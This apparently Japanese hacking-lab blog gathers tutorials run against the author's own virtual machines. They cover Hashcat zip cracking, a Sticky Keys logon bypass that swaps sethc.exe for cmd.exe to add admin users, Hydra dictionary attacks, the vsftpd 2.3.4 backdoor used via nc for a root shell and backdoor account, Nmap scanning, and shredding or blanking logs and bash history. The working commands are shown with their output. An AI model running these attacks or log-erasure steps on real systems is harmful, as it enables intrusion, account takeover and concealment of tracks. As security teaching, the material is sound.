ハッキング実験 | エンジニア・ラボ

ハッキングの実験をするにあたって、攻撃用マシンの準備を行います。 Kali Linuxの準備、基本設定を実施します。

2-2. クラウド上の仮想環境で実験

クラウド上には、ハッキング実験用の仮想マシンや演習用の環境が提供されていることがあります。例えば、AWSやGoogle Cloud Platformなどが挙げられます。クラウド上での実験は、仮想環境に構築する場合と同じく、リスクを最小限に抑えながら、自由自在な実験が可能です。

・クラウド上での実験のメリット
必要なリソースを自由自在に拡張できるため、スケーラビリティに優れている。
セキュリティについて心配する必要がない。

・クラウド上での実験のデメリット
初期費用がかかる場合がある。
クラウド上での実験にはインターネット接続が必要であるため、環境が不安定な場合がある。

2-3. サイトを使う

ハッキング実験用のサイトがいくつか存在しています。例えば、Hack The BoxやTryHackMeなどが挙げられます。これらのサイトを利用することで、自分で環境を構築する手間を省くことができます。また、これらのサイトでは、初心者向けのチュートリアルが用意されているため、手順に従って実験を行うことができます。

・サイトを使う場合のメリット
手軽に始めることができる。
初心者向けのチュートリアルが用意されているため、手順に従って実験を行うことができる。

・サイトを使う場合のデメリット
課金が必要になる可能性がある。
実験環境のカスタマイズが制限される場合がある。

3.必要なツールと技術

ハッキング実験には、いくつかのツールと技術が必要です。

Kali Linux:
ペネトレーションテストやセキュリティ検査に特化したLinuxディストリビューションです。
Metasploit:
脆弱性の検出や攻撃のシミュレーションができるツールです。
Wireshark:
ネットワークトラフィックの解析や監視ができるツールです。
Burp Suite:
Webアプリケーションのセキュリティテストに使用されるツールです。

これらのツールを使いこなすためには、基本的なプログラミング知識やネットワーク技術について学習することが重要です。

4.ハッキング実験の手順

ハッキング実験は、以下の手順で行います。

①情報収集

ターゲットシステムに関する情報（IPアドレスやオープンポートなど）を収集します。

➁脆弱性の検出

MetasploitやNmapを使用して、ターゲットシステムの脆弱性を特定します。

③攻撃の計画

脆弱性を利用した攻撃手法を計画し、実行方法を選択します。

④攻撃の実行

計画した攻撃手法を用いて、ターゲットシステムに対してハッキング実験を行います。
これには、ペネトレーションテストやエクスプロイトの使用が含まれます。

⑤権限の昇格

ターゲットシステム内での権限を昇格させ、より高い権限でシステムを操作できるようにします。

⑥データの収集

攻撃が成功した場合、ターゲットシステムからデータを収集します。

⑦痕跡の消去

実験が終了したら、ターゲットシステム上の痕跡を消去して、元の状態に戻します。

⑧実験後の分析と学習

ハッキング実験が終了したら、以下の点について分析し、学習を深めましょう。

脆弱性の原因: ターゲットシステムの脆弱性がどのような原因で生じたのかを理解します。
攻撃手法の効果: 使用した攻撃手法の効果や限界について検証します。
防御策の改善: ターゲットシステムに対するより強固な防御策を検討し、実装方法を検討します。

5.まとめ

ハッキング実験は、初心者にとってコンピューターセキュリティの知識やスキルを向上させるために重要な活動です。
このブログ投稿では、ハッキング実験の準備方法や実施手順、実験後の分析と学習について説明しました。倫理的な枠組みの中で実験を行い、セキュリティ対策の弱点を特定し、より強固な防御策を構築することが重要です。これらの知識を活かして、あなたもハッキングのエキスパートに一歩近づくことができるでしょう。

Sherlockを使ってSNSのユーザIDを検索

エイド — Thu, 13 Jan 2022 00:00:00 +0000

1.目的
2.Sherlockとは
3.実験
4.まとめ

1.目的

近年、「Tiwitter」や「LINE」といったSNSでアカウントの乗っ取りが多く発生しています。
悪意のあるハッカーは様々な方法でターゲットに関する情報を収集し、不正を働きます。
今回は「Sherlock」を使い、複数のSNSで同じユーザIDが使われていないか検索します。

※注意事項※
このブログの記事はセキュリティ向上を目的として、自分の所有する機器に実験を行います。
他者の機器やネットワークで試すことは絶対にしないでください。詳しくはこちら

2.Sherlockとは

「Sherlock」はPythonで作成されたツールです。
TwitterやFacebook、TikTokなど、様々なSNSで
同じユーザIDが使われているか確認できるツールです。

3.実験

3-1.実験環境

今回は「Kali Linux 」の仮想マシン上で実験を行います。

ハッキングの実験をするにあたって、攻撃用マシンの準備を行います。 Kali Linuxの準備、基本設定を実施します。

3-2.Sherlockインストール

「Python3」および「pip」のインストールが必要です。
インストールしていない場合は、先に以下コマンドでインストールします。

#python3インストール
$sudo apt-get install python3

#pipインストール
$sudo apt install python3-pip

次にSherlockページからインストール手順を確認します。
以下コマンドを順に実行し、Sherlockをインストールします。

# リポジトリのクローン
$ git clone https://github.com/sherlock-project/sherlock.git

# ディレクトリ変更
$ cd sherlock

# 要件をインストール
$ python3 -m pip install -r requirements.txt

インストール完了です。

3-3.ユーザIDの検索

以下コマンドを実行し、ユーザIDを検索します。
今回は”labo”を検索してみます。

$ python3 sherlock.py --print-found labo

└─$ python3 sherlock.py --print-found labo
[*] Checking username labo on:
[+] Blogger: https://labo.blogspot.com
[+] CapFriendly: https://www.capfriendly.com/users/labo
[+] Codecademy: https://www.codecademy.com/profiles/labo
[+] Euw: https://euw.op.gg/summoner/userName=labo
[+] Facenama: https://facenama.com/labo
[+] Gravatar: http://en.gravatar.com/labo
[+] Spotify: https://open.spotify.com/user/labo
[+] TradingView: https://www.tradingview.com/u/labo/
[+] Twitter: https://twitter.com/labo
[+] WordPress: https://labo.wordpress.com/
[+] svidbook: https://www.svidbook.ru/user/labo
......................................

色んなサイトで”labo”が使われていることがわかります。

実験は以上です。

4.まとめ

簡単に同じユーザIDが使われているSNSを確認することができました。
確認されるだけでは特に問題はありませんが
もしも、使いまわしているユーザIDやパスワードが流出した場合、
不正アクセスに利用され、アカウントを乗っ取られる可能性があります。

パスワードの使い分けや二段階認証を使い、対策を行いましょう。

Hashcatを使ってパスワード付きzipファイルを解析

エイド — Thu, 06 Jan 2022 00:00:00 +0000

1.目的
2.Hashcatとは
- 2-1.ハッシュ値
3.実験
4.まとめ

1.目的

今回はHashcatというツールを使って、
パスワード付きzipファイルを解析します。

2.Hashcatとは

Hashcatはハッシュ値からパスワードを解析するのツールです。
様々なハッシュの規格に対応しており、ブルートフォース攻撃や辞書攻撃などの手法が可能です。

2-1.ハッシュ値

ハッシュ値とは、元のデータから特定の計算方法によって求められた値です。
ハッシュ値を求めるための計算手順のことをハッシュ関数と呼ばれます。

3.実験

ハッシュ化に用いられるハッシュ関数はいくつか規格（パターン）が決まっており
hashcatを使うことで、その規格に当てはまるパスワードを解析します。

3-1.zipファイルの用意

本記事ではKali linux環境でzipファイルを用意します。
以下のコマンドでパスワードが「pass」と設定したzipファイルを作成します。

─$ echo "labo" > labo.txt
─$ zip -e --password=pass labo.zip labo.txt

3-2.「zip2john」のインストール

「zip2john」とはzipファイルからハッシュ値を抜き出すためのツールです。
John The Ripperからモジュールをダウンロードし、インストールします。
※Kali Linuxを使えば初めからインストールされています。

3-3.「Hashcat」のインストール

「Hashcat」をWindowsにインストールします。
Hashcatは公式サイトからダウンロードし、適当なフォルダに展開します。
※Kali Linuxを使えば初めからインストールされています。

3-4.ハッシュ値取得

以下コマンドでzipファイルからハッシュ値を取得します。

─$ zip2john labo.zip | cut -d ":" -f 2 > labo.zip.hash
ver 1.0 efh 5455 efh 7875 labo.zip/labo.txt PKZIP Encr: 2b chk, TS_chk, cmplen=17, decmplen=5, crc=50997C0F ts=5929 cs=5929 type=0

─$ cat labo.zip.hash
$pkzip$1*2*2*0*11*5*50997c0f*0*42*0*11*5929*d5803b0e15bdbb752253549abda1607fb5*$/pkzip$

以下hashcatのページでハッシュ形式を確認します。

example_hashes [hashcat wiki]

3-5.パスワード解析

Hashcatを使って、パスワードを解析します。
以下コマンドを実行します。

-$ hashcat -m 17210 -a 3 labo.zip.hash --increment '?a?a?a?a'

-m:ハッシュ形式指定(17210)
-a:アタックモード指定 “3” (ブルートフォース攻撃)
–increment:マスクの長さを指定(指定文字数まで1桁ずつ増やす)
‘?a?a?a?a’:マスク文字指定

Hashcatのwikiからオプションについて詳しく確認できます。

mask_attack [hashcat wiki]

解析の結果、ハッシュ値の後に解析結果「pass」が表示されました。

─$ hashcat -m 17210 -a 3 labo.zip.hash --increment '?a?a?a?a'
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project
............................................
......................................
...........................
................
$pkzip$1*2*2*0*11*5*50997c0f*...52253549abda1607fb5*$/pkzip$:pass

実験は以上です。

4.まとめ

今回はHashcatを使い、zipファイルのパスワードを解析することができました。
記事のような簡単なパスワードだとすぐに解析が終わってしまうため、アルファベットや記号を混ぜた8桁以上の複雑なパスワードを設定しましょう。

Windows10のログオン認証をハッキング

エイド — Fri, 31 Dec 2021 03:00:00 +0000

1.目的
2.Sticky Keys機能を利用したログオン画面の突破
3.実験
4.まとめ
参考サイト、文献

1.目的

今回の目的はWindowsのログオン認証をハッキングします。
自分のWindowsPCのログオンパスワードがわからなくなったときに利用できます。

2.Sticky Keys機能を利用したログオン画面の突破

Windows端末で[Shift]キーを5回押すと、Sticky Keys機能の確認ダイアログが表示されます。
これは[Windows\System32\sethc.exe]というプロセスが起動されており、
ログオン画面でも適用されます。

このプロセスを[cmd.exe]に置き換えて、ローカルアカウントのパスワードをリセットしたり、
新しい管理者ユーザを作ることでログオン認証を突破します。

※Sticky Keys機能とは、補助キー（[Shift]キー、[Ctrl]キー、[Alt]キー、[Win]キー）と他のキーの同時入力が難しいという、身体的ハンディキャップのある人向けのユーザ補助機能です。

3.実験

[sethc.exe]というプロセスを[cmd.exe]に置き換える作業を
コンピュータ修復用のプログラムを利用し実施します。

今回は実験用のWindowsマシンにisoファイルをマウントし、コンピュータ修復を起動します。

3-1.実験環境

この実験における環境は、次の通りです。

Windows10 仮想マシン
Windows10 isoファイル

実験用マシン、ファイルの準備方法は以下の記事で紹介しています。

Windows10構築ハッキング実験用マシン

ハッキング実験用のWindows10マシンを用意します。安全性を考慮して独立したネットワークに準備したいため、仮想化ソフトにWindowsを構築します。

3-2.isoファイルを仮想マシンにマウント

用意したisoファイルを仮想マシンにマウントします。
[仮想マシン設定] > [CD/DVD(SATA)] からisoファイルを指定し、[OK]をクリックします。

3-3.isoファイルからブート

仮想マシンを起動すると、VMwareの起動画面が表示されるので[Esc]キーを押下します。

Boot Managerが表示されるので、CDROM Driveから起動します。

「Press any key to boot from CD or DVD..」という画面が少しの間でるので、
この画面の間に適当なキーを押下します。

3-4.プロセスの置き換え

言語の設定などはデフォルトのまま[次へ]をクリックします。

「今すぐインストール」という画面がでたら、下の「コンピュータを修復」をクリックします。

[トラブルシューティング] > [コマンドプロンプト]の順にクリックします。

コマンドプロンプトが表示されるので、次のように入力します。
ただし、ドライブが見かけ上変わっていることがあるので注意してください。

X:\Sources>c:　　　←カレントディレクトリを移動

C:\>cd c:\windows\system32　　　←通常はCドライブ
c:\Windows\System32>copy sethc.exe sethc_old.exe　　　←プロセスのバックアップを作成
　　　　1個のファイルをコピーしました。
c:\Windows\System32>copy cmd.exe sethc.exe　　　←cmd.exeで置き換える(上書きコピー)
sethc.exe を上書きしますか?(Yes/No/All):y　　　←yを入力
　　　　1個のファイルをコピーしました。
c:\Windows\System32>

以下コマンドを入力し、PCを再起動します。

>shutdown /r /t 0

3-5.ログオン認証画面でコマンドプロンプト起動

再起動後、ログオン認証画面が表示されたら、[Shift]キーを5回押します。
するとコマンドプロンプトが立ち上がります。（System権限）

3-6.パスワード変更、ユーザ作成

・パスワード変更
ユーザ名がわかっている場合は、パスワードを変更してログオンすることが可能です。

C:\Windows\System32>net user admin password　　←adminユーザのパスワードをpasswordに上書き
コマンドは正常に終了しました。

・ユーザ作成
新しく管理者権限のユーザを作成し、そのユーザでログオンします。

C:\Windows\System32>net user eido eido /add　　←ユーザ/パスワード eidoを作成
コマンドは正常に終了しました。

C:\Windows\System32>net localgroup administrators eido /add　　←ユーザeidoに管理者権限付与
コマンドは正常に終了しました。

3-7.Windowsにログオン

上記で変更したパスワード、又は作成したユーザでWindowsにログオンします。

実験は以上です。

4.まとめ

Windowsログオン認証を突破することができました。
また、Sticky Keys機能を元に戻す場合はブートメディアから同じ手順でコマンドプロンプトを起動し、バックアップしたファイルから上書きすれば戻ります。

参考サイト、文献

価格:6,335円
(2021/12/16 01:03時点)

ハッキングの隠蔽 Linuxのログを消去・改ざん

エイド — Tue, 21 Dec 2021 00:00:00 +0000

1.目的
2.ログファイル
3.実験
4.まとめ
参考サイト、文献

1.目的

攻撃者はターゲットマシンに侵入後、痕跡を残さないようにします。
痕跡を残さないことで、アタックを隠蔽したり、追跡を逃れたりできます。

今回は、ターゲット端末（Metasploiteble2）のログを消去・改ざんを行います。

基本的な攻撃の流れは以下の通りです。
1.情報調査ツールを使い、ターゲットの情報を収集
2.脆弱なサービスを特定し、侵入
3.ハッキングの痕跡を隠蔽　　←今回の実験

2.ログファイル

Linuxではログファイルの多くが”/var/log“ディレクトリに格納されています。

─# ls /var/log
apache2             installer            sysstat
apt                 journal              user.log
boot.log.5          messages             vmware-network.7.log
boot.log.6          messages.1           vmware-network.8.log
boot.log.7          messages.2.gz        vmware-network.9.log
........

パス	説明
/var/log/btmp	ログイン失敗を記録
/var/log/wtmp	ログイン成功を記録
/var/log/lastlog	最終ログインを記録
/var/faillog	ログイン失敗回数を記録
/var/log/tallylog	ログイン失敗回数を記録
/var/log/messages	システム関連の記録
/var/log/secure	セキュリティ関連の記録

主要なログファイル

3.実験

前提：ターゲットのroot権限のシェルを奪取済
ログファイルを消去・改ざんとコマンド履歴削除の実験を行います。

3-1.実験環境

この実験における環境は、次の通りです。

・Kali Linux（攻撃用マシン）
名前：kali
IPアドレス：192.168.238.128/24

・Metasploitable2（ターゲットマシン）
名前：metasploitable
IPアドレス：192.168.238.130/24

※実験用マシンの準備は以下ご参照ください。

　　・攻撃用マシン（Kali Linux）の構築

ハッキングの実験をするにあたって、攻撃用マシンの準備を行います。 Kali Linuxの準備、基本設定を実施します。

　　・ターゲットマシン（Metasploitable2）の構築

ハッキングの実験をするにあたって、攻撃先マシンの準備を行います。 Metasploitable2の準備、基本設定を実施します。

3-2.ログの消去

もっとも簡単な隠蔽方法は、ディレクトリ内のログファイルを削除してしまうことです。
（ファイルが消えていれば、すぐにバレる可能性があります。）

rmコマンドではファイルの内容は完全に消えないため、
shredコマンドを使って、データが復旧できないように完全削除します。
以下コマンドを実行します。

# shred -n 3 -zu /var/log/messages

-n：ランダム情報を書き込む回数
-z：最後にゼロを書き込む
-u：shred終了後にファイルを削除する

─# ls /var/log
apache2             installer            user.log
apt                 journal              vmware-network.7.log
boot.log.5          messages.1           vmware-network.8.log
boot.log.6          messages.2.gz        vmware-network.9.log
boot.log.7          sysstat
........
....

“messages”が消去されました。

3-3.ログの改ざん

ファイルの中身だけをクリアする方法です。
リダイレクトの「>」の左側に何も入力せずに実行します。

# > /var/log/messages

ファイルの内容だけがクリアされ、ファイルだけが残ります。

─# cat /var/log/messages
Dec 15 06:44:35 kali lightdm[534]: Error getting user list from org.freedesktop.Accounts: GDBus.Error:org.freedesktop.DBus.Error.ServiceUnknown: The name org.freedesktop.Accounts was not provided by any .service files
Dec 15 06:44:35 kali kernel: [   23.029451] e1000: eth0 NIC Link is Up 1000 Mbps Full Duplex, Flow Control: None
..............
.........

↓

─# > /var/log/messages
^C
─# cat /var/log/messages

3-4.コマンド履歴を消去

Linuxではコマンドを入力すると、”.bash_history“に履歴が記録されます。
コマンド履歴から攻撃内容がバレる可能性があるため、隠蔽します。
※[↑]キーを入力時にコマンドが表示される

まずデフォルトで1000コマンド記録されますが、これを0に変更します。

-# echo $HISTSIZE
1000
-# export HISTSIZE=0
-# echo $HISTSIZE
0

これで新たなコマンドの履歴は記録されません。そのうえ、コマンド履歴内容を改ざんします。

-# > ~/.bash_history

これでコマンド履歴が消去されました。

実験は以上です。

4.まとめ

今回はLinuxのログを消去・改ざんする実験を行いました。
このように攻撃者は痕跡を巧妙に消すため、ログ管理システムなどを使用し、
ログを安全に保管する必要があります。

参考サイト、文献

Nmapでポートスキャンの実験
Kali Linux ツール

価格:6,335円
(2021/12/16 01:03時点)

Hydraを使った辞書攻撃でアカウント、パスワードをハッキング

エイド — Sat, 18 Dec 2021 00:00:00 +0000

1.目的
2.Hydra
3.実験
4.まとめ
参考サイト、文献

1.目的

Hydraを使い、ターゲットマシンのFTPアカウントとSSHアカウントの
ユーザ名、パスワードを解析します。

基本的な攻撃の流れは以下の通りです。
1.情報調査ツールを使い、ターゲットの情報を収集　←nmapで収集
2.空いているポートに対し攻撃　　　　　　　　　　←今回の実験

　　nmapでの情報収集は以下の記事をご覧ください。

Nmapを使いターゲットの空いているポートや、提供しているサービス、OS情報などを収集し、脆弱なサービスがないか調査します。

2.Hydra

Hydraとは、オンラインでパスワードをクラックする有名なツールです。
SSHやFTPアカウント、Webサービスのログインフォームに対してクラッキングできます。

今回の実験は辞書リストを作成し、ターゲットマシンへ辞書攻撃を行います。

3.実験

攻撃用マシン（Kali Linux）からターゲットマシン（Metasploitable2）へ攻撃します。

3-1.実験環境

この実験における環境は、次の通りです。

・Kali Linux（攻撃用マシン）
名前：kali
IPアドレス：192.168.238.128/24

・Metasploitable2（ターゲットマシン）
名前：metasploitable
IPアドレス：192.168.238.130/24

※実験用マシンの準備は以下をご覧ください。

　　・攻撃用マシン（Kali Linux）の構築

ハッキングの実験をするにあたって、攻撃用マシンの準備を行います。 Kali Linuxの準備、基本設定を実施します。

　　・ターゲットマシン（Metasploitable2）の構築

ハッキングの実験をするにあたって、攻撃先マシンの準備を行います。 Metasploitable2の準備、基本設定を実施します。

3-2.実験の用意

Hydra使いFTPアカウントとSSHアカウントを解析します。
まずは、ユーザリスト[user.lst]とパスワードリスト[pass.lst]を作成します。

・ユーザリストを作成
攻撃用マシンのターミナルから以下コマンドを実行し、ユーザ名を記述していきます。

kali:~$ cat > user.lst

─$ cat > user.lst
root
sys
msfadmin
admin
user
service
postgres
tomcat
eido
　　←[ctrl]+[c]で抜ける

・パスワードリストを作成
攻撃用マシンのターミナルから以下コマンドを実行し、パスワードを記述していきます。

kali:~$ cat > pass.lst

─$ cat > pass.lst
user
password
12345678
msfadmin
root
guest
batman
asdfasdf
tomcat
eido
　　←[ctrl]+[c]で抜ける

実験の用意は以上です。

3-3.実験開始

・FTPアカウントを解析します。
攻撃用マシンのターミナルから以下コマンドを実行します。
※最後にターゲットIPとプロトコルを指定します。

kali:~$ hydra -L user.lst -P pass.lst -t 8 192.168.238.130 ftp

-L：ユーザリストを指定[user.lst]
-P：パスワードリストを指定[pass.lst]
-t：並列処理のタスク数を指定　※デフォルトでは16ですが、ここでは8に下げました。

─$ hydra -L user.lst -P pass.lst -t 8 192.168.238.130 ftp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-16 11:21:27
[DATA] max 8 tasks per 1 server, overall 8 tasks, 90 login tries (l:9/p:10), ~12 tries per task
[DATA] attacking ftp://192.168.238.130:21/
[21][ftp] host: 192.168.238.130   login: msfadmin   password: msfadmin
[21][ftp] host: 192.168.238.130   login: user   password: user
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-16 11:22:03

・結果
ユーザ名：msfadmin　パスワード：msfadmin
ユーザ名：user　パスワード：user

FTPアカウントを2つ解析できました。

・SSHアカウントを解析します。
FTPの辞書攻撃と同じ書式ですが、並列処理数を4、最後のプロトコルをsshにします。

kali:~$ hydra -L user.lst -P pass.lst -t 4 192.168.238.130 ssh

また、プロトコルのポート番号が変更されている場合
次のような書式でも解析できます。

kali:~$ hydra -L user.lst -P pass.lst -t 4 ssh://192.168.238.130:22

─$ hydra -L user.lst -P pass.lst -t 4 192.168.238.130 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-16 11:25:14
[DATA] max 4 tasks per 1 server, overall 4 tasks, 90 login tries (l:9/p:10), ~23 tries per task
[DATA] attacking ssh://192.168.238.130:22/
[22][ssh] host: 192.168.238.130   login: sys   password: batman
[22][ssh] host: 192.168.238.130   login: msfadmin   password: msfadmin
[22][ssh] host: 192.168.238.130   login: user   password: user
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-16 11:25:50

・結果
ユーザ名：sys　パスワード：batman
ユーザ名：msfadmin　パスワード：msfadmin
ユーザ名：user　パスワード：user

SSHアカウントを3つ解析できました。

実験は以上です。

4.まとめ

今回はオンラインパスワードクラックの実験を行いました。
ターゲットマシンは脆弱なアカウントを使っているため、辞書攻撃は約30秒程で終わり、
簡単なユーザ名、パスワードにしていると、すぐに解読されてしまうことがわかりました。

また、今回はリストを自作しましたが、Web上には有名な辞書ファイルがたくさんあります。
今回の実験を参考に、新しい実験を試してみてください。

参考サイト、文献

Nmapでポートスキャンの実験
Kali Linux ツール

価格:6,335円
(2021/12/16 01:03時点)

vsftpd 2.3.4 脆弱性　リモートから任意のコマンド実行

エイド — Wed, 15 Dec 2021 22:00:00 +0000

1.目的
2.脆弱性について
3.実験
- 3-1.実験環境
- 3-2.実験開始
4.まとめ
参考サイト、文献

1.目的

vsftp2.3.4の脆弱性を利用し、ターゲットマシンのバックドアから任意のコマンドを実行します。

基本的な攻撃の流れは以下の通りです。
1.情報調査ツールを使い、ターゲットの情報を収集　←nmapで収集
2.脆弱なサービスを特定し、侵入　　　　　　　　　←今回の実験

　　・nmapでの情報収集は以下の記事をご覧ください。

Nmapを使いターゲットの空いているポートや、提供しているサービス、OS情報などを収集し、脆弱なサービスがないか調査します。

2.脆弱性について

vsftp 2.3.4をExploit Databaseで検索すると、
「Backdoor Command Execution」という脆弱性があることがわかりました。

・Exploit Database
https://www.exploit-db.com/

解説によると、
vsftpd 2.3.4にはリモートからコマンド実行を可能とするバックドアが含まれているようです。
「:)」を含むユーザ名でFTPにログインすると、ポート6200にバックドアが開きます。
ポート6200(TCP)にアクセスすることで、vsftpdの実行権限で任意のコマンドを実行できるようです。

3.実験

攻撃用マシン（Kali Linux）からターゲットマシン（Metasploitable2）へ侵入します。

3-1.実験環境

この実験における環境は、次の通りです。

・Kali Linux（攻撃用マシン）
名前：kali
IPアドレス：192.168.238.128/24

・Metasploitable2（ターゲットマシン）
名前：metasploitable
IPアドレス：192.168.238.130/24

※実験用マシンの準備は以下ご参照ください。

　　・攻撃用マシン（Kali Linux）の構築

ハッキングの実験をするにあたって、攻撃用マシンの準備を行います。 Kali Linuxの準備、基本設定を実施します。

　　・ターゲットマシン（Metasploitable2）の構築

ハッキングの実験をするにあたって、攻撃先マシンの準備を行います。 Metasploitable2の準備、基本設定を実施します。

3-2.実験開始

まず、ターゲットマシン上のポート6200（TCP）は開いていません。

msfadmin@metasploitable:~$ netstat -na | grep 6200
(出力なし)

では、攻撃用マシン（Kali Linux）からターゲットマシンの
ポート21（FTP）にアクセスしてみます。※「:)」を含むユーザ名

$ nc  192.168.238.130 21

─$ nc 192.168.238.130 21
220 (vsFTPd 2.3.4)
User 1234:)　　←Userコマンドを入力し、「:)」を含めたユーザ名を入力する
331 Please specify the password.
Pass hoge　　　←Passコマンドを入力し、適当な文字列を入力する

「1234:)」なんてユーザはいないので、もちろんログインは失敗します。
しかし、ログインを試みた時点でターゲットマシンのポート6200（TCP）が開いていることがわかります。

msfadmin@metasploitable:~$ netstat -na | grep 6200
tcp　　　　　0　　　　0 0.0.0.0:6200　　　　　 0.0.0.0:*　　　　　　LISTEN

攻撃用マシン（Kali Linux）で別のターミナルを起動し、
ターゲットマシンのポート6200にアクセスします。
すると、プロンプトは返ってこないが、任意のコマンドを実行できることがわかります。

$ nc -nv 192.168.238.130 6200

─$ nc -nv 192.168.238.130 6200
(UNKNOWN) [192.168.238.130] 6200 (?) open
whoami　　←whoamiコマンドを入力すると、rootが返ってくる
root

root権限なのでほとんどのコマンドが通ります。
例えば、バックドア用の新しいユーザを作成し、いつでも侵入できるようにすることも可能です。

─$ nc -nv 192.168.238.130 6200
(UNKNOWN) [192.168.238.130] 6200 (?) open
whoami
root
useradd -m eido -G sudo -s /bin/bash; passwd newuser　←新しいユーザ作成
Enter new UNIX password: eido
Retype new UNIX password: eido
passwd: password updated successfully
exit

これが今回の脆弱性となります。

4.まとめ

先ほど紹介したサイト（Exploit Database）を確認すると、
Metasploitに含まれているソースコードを確認することができます。
ソースコードは結構長く記述されてますが、ポイントとなる攻撃の流れを確認するだけであれば、
細かい文法を気にする必要はありません。
他にも様々なExploitが載っており、見ているだけで勉強になると思います。

参考サイト、文献

価格:6,335円
(2021/12/16 01:03時点)

Nmapでポートスキャンの実験Kali Linux ツール

エイド — Mon, 13 Dec 2021 16:46:38 +0000

1.目的
2.機能
3.使用方法/オプション
- 3-1.使用方法
- 3-2.オプション例
4.実験
- 4-1.実験環境
- 4-2.実験開始
6.まとめ
参考サイト、文献

1.目的

Nmapを使いターゲットの空いているポートや、提供しているサービス、OS情報などを収集し、
脆弱なサービスがないか調査します。

基本的な攻撃の流れは以下の通りです。
1.情報調査ツールを使い、ターゲットの情報を収集　←nmapで収集
2.脆弱なサービスを特定し、侵入

2.機能

Nmap（Network Mapper）は、ネットワークの調査や監査に使用するツールです。
ネットワーク上の接続可能なホストや実行しているOS、サービスのバージョンなどを
調査することができます。

この調査はセキュリティが正常に機能しているか、確認することを目的としています。
他者のサーバ機器にスキャンを行うと不正アクセスに該当する可能性があるため、注意が必要です。

3.使用方法/オプション

3-1.使用方法

Windowsの場合はnmapをインストールする必要がありますが、
Kali Linuxの場合はデフォルトで使用可能です。

使用方法はターミナルでnmap <ターゲットのIP情報> を入力するだけです。

3-2.オプション例

オプションを追加することで、ポートスキャン方法を変更することができます。

オプション	使い方
-sP	Pingスキャン
-sV	サービスのバージョンを検出
-O	OSの特定
-A	OSの特定とバージョンを検出
-sT	TCP Connect スキャン
-sU	UDPスキャン
-oN	通常出力

4.実験

攻撃用マシン（Kali Linux）からターゲットマシン（Metasploitable2）へスキャンします。

4-1.実験環境

この実験における環境は、次の通りです。

・Kali Linux（攻撃用マシン）
名前：kali
IPアドレス：192.168.238.128/24

・Metasploitable2（ターゲットマシン）
名前：metasploitable
IPアドレス：192.168.238.130/24

※実験用マシンの準備は以下ご参照ください。

　　・攻撃用マシン（Kali Linux）の構築

ハッキングの実験をするにあたって、攻撃用マシンの準備を行います。 Kali Linuxの準備、基本設定を実施します。

　　・ターゲットマシン（Metasploitable2）の構築

ハッキングの実験をするにあたって、攻撃先マシンの準備を行います。 Metasploitable2の準備、基本設定を実施します。

4-2.実験開始

攻撃用マシン（Kali Linux）から以下コマンドを実行します。

$ nmap -sP 192.168.238.0/24

─$ nmap -sP 192.168.238.0/24                                                                                                                                                                                                          
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-13 10:08 EST
Nmap scan report for 192.168.238.2
Host is up (0.00074s latency).
Nmap scan report for 192.168.238.128
Host is up (0.00045s latency).
Nmap scan report for 192.168.238.130　←ターゲットマシン
Host is up (0.0028s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.68 seconds

指定したネットワーク内にIPアドレス 192.168.238.130（ターゲットマシン）が確認できます。

次にターゲットマシンの開いているポート番号、サービス情報とOSの種類を調べます。

$ nmap -sV -O -p- 192.168.238.130

-p-:1番から65535番までのポート番号を対象
-sV:サービスのバージョンを検出
-O:ターゲットのOSを特定

─$ nmap -sV -O -p- 192.168.238.130
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-13 10:26 EST
Nmap scan report for 192.168.238.130
Host is up (0.00047s latency).
Not shown: 65505 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
53/tcp    open  domain      ISC BIND 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login       OpenBSD or Solaris rlogind
514/tcp   open  tcpwrapped
1099/tcp  open  java-rmi    GNU Classpath grmiregistry
1524/tcp  open  bindshell   Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc         VNC (protocol 3.3)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         UnrealIRCd
6697/tcp  open  irc         UnrealIRCd
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
32980/tcp open  java-rmi    GNU Classpath grmiregistry
35878/tcp open  nlockmgr    1-4 (RPC #100021)
38097/tcp open  mountd      1-3 (RPC #100005)
59425/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
